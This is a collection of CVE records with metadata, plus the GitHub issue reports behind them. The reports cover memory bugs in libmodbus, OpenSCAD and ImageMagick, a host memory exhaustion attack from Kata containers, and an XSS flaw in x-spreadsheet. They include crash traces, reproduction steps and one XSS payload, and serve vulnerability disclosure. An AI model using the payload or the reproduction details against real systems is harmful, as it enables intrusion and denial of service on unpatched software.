<kill> 0x7ffff7df71df <killpg+15> nop ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsi r9 rsp 0x7fffffffdbd0 ◂— 0x0 01:0008│ 0x7fffffffdbd8 ◂— 0x0 02:0010│ 0x7fffffffdbe0 ◂— 0x2f2f2f2f2f2f2f2f ('////////') 03:0018│ 0x7fffffffdbe8 —▸ 0x7ffff7dc61e0 ◂— 0x10001200001694 04:0020│ 0x7fffffffdbf0 —▸ 0x7fffffffdf90 —▸ 0x5555555592a0 ◂— 0x4000000ff 05:0028│ 0x7fffffffdbf8 —▸ 0x7ffff7fe7c2e ◂— mov r11, rax 06:0030│ 0x7fffffffdc00 ◂— 0x0 07:0038│ 0x7fffffffdc08 —▸ 0x7ffff7ec2987 (close+23) ◂— cmp rax, -0x1000 /* 'H=' */ ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff7df718b raise+203 f 1 0x7ffff7dd6859 abort+299 f 2 0x7ffff7e413ee __libc_message+670 f 3 0x7ffff7e4947c f 4 0x7ffff7e4b12c _int_free+1900 f 5 0x555555555783 main+771 f 6 0x7ffff7dd80b3 __libc_start_main+243 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> ``` ## libmodbus output with debug mode enabled ``` ./unit-test-server The client connection from 127.0.0.1 is accepted Waiting for an indication... <03><DD><00><00><00><0D><FF><17><01><62><00><01><00><84><00><01><02><D7><11> [03][DD][00][00][00][05][FF][17][02][00][00] Waiting for an indication... ERROR Connection reset by peer: read Quit the loop: Connection reset by peer double free or corruption (!prev) [1] 3966417 abort ./unit-test-server ```
Heap-based Buffer Overflow in modbus_reply
https://api.github.com/repos/stephane/libmodbus/issues/614/comments
14
2021-12-22T10:46:59Z
2023-02-11T02:24:21Z
https://github.com/stephane/libmodbus/issues/614
1,086,695,047
614
4,062
CVE-2022-0480
2022-08-29T15:15:09.477
A flaw was found in the filelock_init in fs/locks.c function in the Linux kernel. This issue can lead to host memory exhaustion due to memcg not limiting the number of Portable Operating System Interface (POSIX) file locks.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2022-0480" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2049700" }, { "source": "secalert@redhat.com", "tags": [ "Patch" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0f12156dff2862ac54235fc72703f18770769042" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kata-containers/kata-containers/issues/3373" }, { "source": "secalert@redhat.com", "tags": [ "Vendor Advisory" ], "url": "https://lore.kernel.org/linux-mm/20210902215519.AWcuVc3li%25akpm%40linux-foundation.org/" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://ubuntu.com/security/CVE-2022-0480" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2022-0480" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2049700" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0f12156dff2862ac54235fc72703f18770769042" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kata-containers/kata-containers/issues/3373" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://lore.kernel.org/linux-mm/20210902215519.AWcuVc3li%25akpm%40linux-foundation.org/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://ubuntu.com/security/CVE-2022-0480" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "matchCriteriaId": "037A6DFB-B41D-4CC7-86C1-A201809B79C4", "versionEndExcluding": "5.15", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/kata-containers/kata-containers/issues/3373
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kata-containers", "kata-containers" ]
This is Yutian Yang from Zhejiang University. Our team have discovered a new attack from inside Kata containers, leading to host memory exhaustion. The root cause lies in the Linux kernel, even in the latest version. Briefly speaking, the kernel memcg does not charge posix locks allocated by user processes. The bug report and patches can be found at https://lore.kernel.org/linux-mm/20210902215519.AWcuVc3li%25akpm@linux-foundation.org/ Unfortunately, we find that even virtualized containers like Kata are also affected by this bug. With "-o posix_lock" option enabled, Kata runtime forwards posix lock allocation requests to virtiofsd on the host. The virtiofsd then allocates posix locks on behalf. Although virtiofsd processes are limited by memcg, memory consumption of posix locks in kernel are not properly charged. Attackers inside containers can thus allocate a huge number of posix locks to run out of all memory on the node. Note that the number of posix locks are not limited by rlimit/sysctl by default. We have developed a PoC that causes host memory exhaustion. We are glad to share them via emails if you are interested in reproducing the attack. We also want to discuss whether there is a way to mitigate such problems. A quick mitigation could be disabling the "-o posix_lock" option. However, how can we enable the functionality without triggering kernel bugs before they are patched in the kernel code?
Host Memory Exhaustion Attack from Inside Kata Containers
https://api.github.com/repos/kata-containers/kata-containers/issues/3373/comments
16
2022-01-03T12:33:47Z
2022-02-03T11:09:36Z
https://github.com/kata-containers/kata-containers/issues/3373
1,092,474,299
3,373
4,063
CVE-2022-0496
2022-08-29T15:15:09.597
A vulnerbiility was found in Openscad, where a DXF-format drawing with particular (not necessarily malformed!) properties may cause an out-of-bounds memory access when imported using import().
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2050695" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/openscad/openscad/commit/00a4692989c4e2f191525f73f24ad8727bacdf41" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/openscad/openscad/commit/770e3234cbfe66edbc0333f796b46d36a74aa652" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/openscad/openscad/issues/4037" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2050695" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/openscad/openscad/commit/00a4692989c4e2f191525f73f24ad8727bacdf41" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/openscad/openscad/commit/770e3234cbfe66edbc0333f796b46d36a74aa652" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/openscad/openscad/issues/4037" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openscad:openscad:*:*:*:*:*:*:*:*", "matchCriteriaId": "B1CAB560-2A16-496D-8216-1EC6B102BB0A", "versionEndExcluding": "2022-02-04", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/openscad/openscad/issues/4037
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "openscad", "openscad" ]
### Summary A DXF-format drawing with particular (not necessarily malformed!) properties may cause an out-of-bounds memory access when imported using `import()`. ### Vulnerable versions * OpenSCAD Linux (commit eedf37059ca9ce81c09b9270c99257c3d7f74c43) * OpenSCAD Windows x64 (2021.01) ### Steps to reproduce Two Proof-of-concept files are provided. `oob_dxfdata_505` is larger, but more reliably reproduces the fault. `oob_dxfdata_k5` is my attempt at a minimal working example, but only reliably crashes the linux build from the latest commit on the `main` branch (i.e. it does not crash in the windows release). Both illustrate the same crash, so I expect the `_min` example to be more helpful in testing. [oob_dxfdata_505.zip, the larger messier p-o-c](https://github.com/openscad/openscad/files/7817409/oob_dxfdata_505.zip) [oob_dxfdata_k5.zip, the smaller p-o-c](https://github.com/openscad/openscad/files/7817410/oob_dxfdata_k5.zip) 1. Unzip one of the provided proof of concept files 2. Open the `.scad` file in OpenSCAD 3. Render with F6 4. Observe the application crashing Alternatively, for headless operation: 1. Unzip one of the provided proof of concept files 2. `openscad --export-format stl -o /dev/null oob_dxfdata_k5.scad` 3. Observe the segmentation fault ### Screenshot ![image](https://user-images.githubusercontent.com/158607/148279749-0020ca94-75ad-43a3-9be4-0a81ae29f62e.png) ### Cause I haven't quite been able to wrap my head around the DXF parser yet, but the OOB access occurs in `src/dxfdata.cc` on one of the lines [470](https://github.com/openscad/openscad/blob/eedf37059ca9ce81c09b9270c99257c3d7f74c43/src/dxfdata.cc#L470), [475](https://github.com/openscad/openscad/blob/eedf37059ca9ce81c09b9270c99257c3d7f74c43/src/dxfdata.cc#L475), [505](https://github.com/openscad/openscad/blob/eedf37059ca9ce81c09b9270c99257c3d7f74c43/src/dxfdata.cc#L505), or [510](https://github.com/openscad/openscad/blob/eedf37059ca9ce81c09b9270c99257c3d7f74c43/src/dxfdata.cc#L510) depending on the input file. It appears to be related to the fact that if multiple line segments share points in common, they are merged into contiguous paths. As a part of this, The [ADD_LINE](https://github.com/openscad/openscad/blob/eedf37059ca9ce81c09b9270c99257c3d7f74c43/src/dxfdata.cc#L99) macro manipulates the `grid.data<>` and `lines<>` structures. By creating lines either in the `ENTITIES` section of the DXF file or outside of it, an attacker is able to ensure that the `grid.data` entry created on line [108](https://github.com/openscad/openscad/blob/eedf37059ca9ce81c09b9270c99257c3d7f74c43/src/dxfdata.cc#L108) points to an index in `lines` which never becomes valid. On line 470 (and the others listed above), this value (`k`) is used as an index into `lines`, out of bounds. ### Impact It appears that the out-of-bounds data can only be read, and not written. An out-of-bounds read does not expose a security vulnerability on its own, but can be used to bypass automatic security features such as stack canaries and pointer encryption. ### Proposed mitigation The algorithm employed in `DxfData::DxfData` needs to be revised to prevent this type of aliasing. Without more insight into the DXF format and how it is used by OpenSCAD, I cannot say for sure where the actual flaw lies. It seems likely that the `ADD_LINE` macro on lines 108-109 is the culprit, since it inserts values that will be used for indexing even though the values are not yet valid indices.
Out-of-bounds memory access in DXF loader (path identification)
https://api.github.com/repos/openscad/openscad/issues/4037/comments
9
2022-01-05T19:57:35Z
2022-02-05T01:53:54Z
https://github.com/openscad/openscad/issues/4037
1,094,696,669
4,037
4,064
CVE-2022-0497
2022-08-29T15:15:09.650
A vulnerbiility was found in Openscad, where a .scad file with no trailing newline could cause an out-of-bounds read during parsing of annotations.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2050699" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/openscad/openscad/issues/4043" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/openscad/openscad/pull/4044" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2050699" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/openscad/openscad/issues/4043" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/openscad/openscad/pull/4044" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openscad:openscad:*:*:*:*:*:*:*:*", "matchCriteriaId": "715D4AF8-E090-42D2-BE4E-125F287BD9FF", "versionEndExcluding": "2022-01-09", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/openscad/openscad/issues/4043
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "openscad", "openscad" ]
### Summary A .scad file with no trailing newline may cause an out-of-bounds read during parsing of annotations. ### Vulnerable versions * OpenSCAD (commit 374fa5853faeadf48afb55a0e4482f7b14b4f280) ### Steps to reproduce 1. Unzip the [provided proof-of-concept file](https://github.com/openscad/openscad/files/7835504/oobr_comment.zip) 2. `openscad --export-format stl -o /dev/null oobr_comment.scad` 3. Observe the segmentation fault ``` albin@KNYTT:openscad$ ./openscad.bin --export-format stl -o /dev/null pocs_manual/oobr_comment.scad Could not initialize localization. UndefinedBehaviorSanitizer:DEADLYSIGNAL ==12619==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x00000d384000 (pc 0x00000064254d bp 0x7ffe70e82d60 sp 0x7ffe70e82bf0 T12619) ==12619==The signal is caused by a READ memory access. #0 0x64254c in getComment(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, int) /home/albin/fuzz/openscad/openscad/src/comment.cc:95:9 #1 0x6401b9 in CommentParser::collectParameters(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, SourceFile*) /home/albin/fuzz/openscad/openscad/src/comment.cc:284:25 #2 0x464526 in cmdline(CommandLine const&) /home/albin/fuzz/openscad/openscad/src/openscad.cc:411:2 #3 0x479f04 in main /home/albin/fuzz/openscad/openscad/src/openscad.cc:1230:12 #4 0x7f39dec7e0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #5 0x4390cd in _start (/home/albin/fuzz/openscad/openscad/build/openscad+0x4390cd) UndefinedBehaviorSanitizer can not provide additional info. ==12619==ABORTING ``` ### Cause The seek through the `fulltext` string at [comment.cc:95](https://github.com/openscad/openscad/blob/374fa5853faeadf48afb55a0e4482f7b14b4f280/src/comment.cc#L95) only searches for `\n`, but ignores the potential end of the text. As a result, a file which ends without a `\n` character will cause this loop to read out of bounds. ### Impact It appears that the out-of-bounds data can only be read, and not written. An out-of-bounds read does not expose a security vulnerability on its own, but can be used to bypass automatic security features such as stack canaries and pointer encryption. ### Proposed mitigation Also check against `fulltext.size()` in the loop, to ensure that `end` does not exceed the length of the file.
Out-of-bounds memory access in comment parser (file without trailing newline)
https://api.github.com/repos/openscad/openscad/issues/4043/comments
2
2022-01-09T17:08:37Z
2022-02-04T13:50:30Z
https://github.com/openscad/openscad/issues/4043
1,097,250,051
4,043
4,065
CVE-2022-1115
2022-08-29T15:15:10.297
A heap-buffer-overflow flaw was found in ImageMagick’s PushShortPixel() function of quantum-private.h file. This vulnerability is triggered when an attacker passes a specially crafted TIFF image file to ImageMagick for conversion, potentially leading to a denial of service.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2022-1115" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2067022" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/c8718305f120293d8bf13724f12eed885d830b09" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/4974" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/1f860f52bd8d58737ad883072203391096b30b51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2022-1115" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2067022" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/c8718305f120293d8bf13724f12eed885d830b09" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/4974" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/1f860f52bd8d58737ad883072203391096b30b51" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "62ED872E-70D8-4736-9876-F307A77839D4", "versionEndExcluding": "6.9.12-44", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "0A56872F-F8A5-4447-8D18-8DA94072BD22", "versionEndExcluding": "7.1.0-29", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.0.0-0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/ImageMagick/ImageMagick/issues/4974
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.0-28 ### Operating system Linux ### Operating system, version and so on OS: Ubuntu 20.04.3 LTS Version: ImageMagick 7.1.0-28 Q16-HDRI x86_64 2022-03-04 https://imagemagick.org Copyright: (C) 1999 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI Delegates (built-in): bzlib fontconfig freetype jbig jng jpeg lzma pangocairo png tiff x xml zlib Compiler: gcc (4.2) ### Description Hello, We found a heap overflow vulnerability in magick ### Steps to Reproduce build it `CC=afl-clang-lto CXX=afl-clang-lto++ CFLAGS="-g -fsanitize=address -fno-omit-frame-pointer" CXXFLAGS="-g -fsanitize=address -fno-omit-frame-pointer" LDFLAGS="-g -fsanitize=address -fno-omit-frame-pointer" ./configure --disable-shared --prefix="/root/fuzz/target/imagemagick/ImageMagick/install"` `AFL_USE_ASAN=1 make -j24 && make install -j24` run it `./magick convert poc /dev/null` output ================================================================= ==1195823==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61900000181c at pc 0x000000cd5328 bp 0x7ffdacd61fa0 sp 0x7ffdacd61f98 READ of size 1 at 0x61900000181c thread T0 #0 0xcd5327 in PushShortPixel /root/fuzz/target/image_magick/ImageMagick/./MagickCore/quantum-private.h #1 0xcd5327 in ImportRGBAQuantum /root/fuzz/target/image_magick/ImageMagick/MagickCore/quantum-import.c:4232:15 #2 0xcd5327 in ImportQuantumPixels /root/fuzz/target/image_magick/ImageMagick/MagickCore/quantum-import.c:4780:7 #3 0x13e73f2 in ReadTIFFImage /root/fuzz/target/imagemagick/ImageMagick/coders/tiff.c:2052:24 #4 0x6f9981 in ReadImage /root/fuzz/target/image_magick/ImageMagick/MagickCore/constitute.c:728:15 #5 0x6fe991 in ReadImages /root/fuzz/target/image_magick/ImageMagick/MagickCore/constitute.c:1075:9 #6 0x157caa5 in ConvertImageCommand /root/fuzz/target/imagemagick/ImageMagick/MagickWand/convert.c:614:18 #7 0x17191fd in MagickCommandGenesis /root/fuzz/target/imagemagick/ImageMagick/MagickWand/mogrify.c:188:14 #8 0x580b89 in MagickMain /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:150:10 #9 0x580b89 in main /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:182:10 #10 0x7f499b68b0b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16 #11 0x4ce36d in _start (/root/fuzz/target/imagemagick/ImageMagick/install/bin/magick+0x4ce36d) 0x61900000181c is located 10 bytes to the right of 914-byte region [0x619000001480,0x619000001812) allocated by thread T0 here: #0 0x54ab1d in malloc (/root/fuzz/target/imagemagick/ImageMagick/install/bin/magick+0x54ab1d) #1 0x13e6faf in ReadTIFFImage /root/fuzz/target/imagemagick/ImageMagick/coders/tiff.c:1996:39 #2 0x6f9981 in ReadImage /root/fuzz/target/image_magick/ImageMagick/MagickCore/constitute.c:728:15 #3 0x6fe991 in ReadImages /root/fuzz/target/image_magick/ImageMagick/MagickCore/constitute.c:1075:9 #4 0x157caa5 in ConvertImageCommand /root/fuzz/target/imagemagick/ImageMagick/MagickWand/convert.c:614:18 #5 0x17191fd in MagickCommandGenesis /root/fuzz/target/imagemagick/ImageMagick/MagickWand/mogrify.c:188:14 #6 0x580b89 in MagickMain /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:150:10 #7 0x580b89 in main /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:182:10 #8 0x7f499b68b0b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /root/fuzz/target/image_magick/ImageMagick/./MagickCore/quantum-private.h in PushShortPixel Shadow bytes around the buggy address: 0x0c327fff82b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff82c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff82d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff82e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff82f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c327fff8300: 00 00 02[fa]fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8310: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8320: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8330: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==1195823==ABORTING ### Images [poc.zip](https://github.com/ImageMagick/ImageMagick/files/8320342/poc.zip)
heap-buffer-overflow in magick at quantum-private.h PushShortPixel
https://api.github.com/repos/ImageMagick/ImageMagick/issues/4974/comments
1
2022-03-22T02:10:38Z
2022-03-24T01:28:05Z
https://github.com/ImageMagick/ImageMagick/issues/4974
1,176,173,021
4,974
4,066
CVE-2022-25646
2022-08-30T05:15:07.607
All versions of package x-data-spreadsheet are vulnerable to Cross-site Scripting (XSS) due to missing sanitization of values inserted into the cells.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.5, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/myliang/x-spreadsheet/issues/580" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JS-XDATASPREADSHEET-2430381" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://youtu.be/Ij-8VVKNh7U" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/myliang/x-spreadsheet/issues/580" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JS-XDATASPREADSHEET-2430381" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://youtu.be/Ij-8VVKNh7U" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:x-data-spreadsheet_project:x-data-spreadsheet:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "EAB5CA5D-367A-4344-8151-1C2C41E9CD2D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/myliang/x-spreadsheet/issues/580
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "myliang", "x-spreadsheet" ]
xss found PoC: https://ibb.co/XbdMNVV Payload: `"><img src=1 onerror=alert(document.domain)>`
xss bug found
https://api.github.com/repos/myliang/x-spreadsheet/issues/580/comments
1
2022-03-18T06:45:03Z
2022-07-16T01:50:21Z
https://github.com/myliang/x-spreadsheet/issues/580
1,173,239,466
580
4,067
CVE-2022-36747
2022-08-30T22:15:09.537
Razor v0.8.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the function uploadchannel().
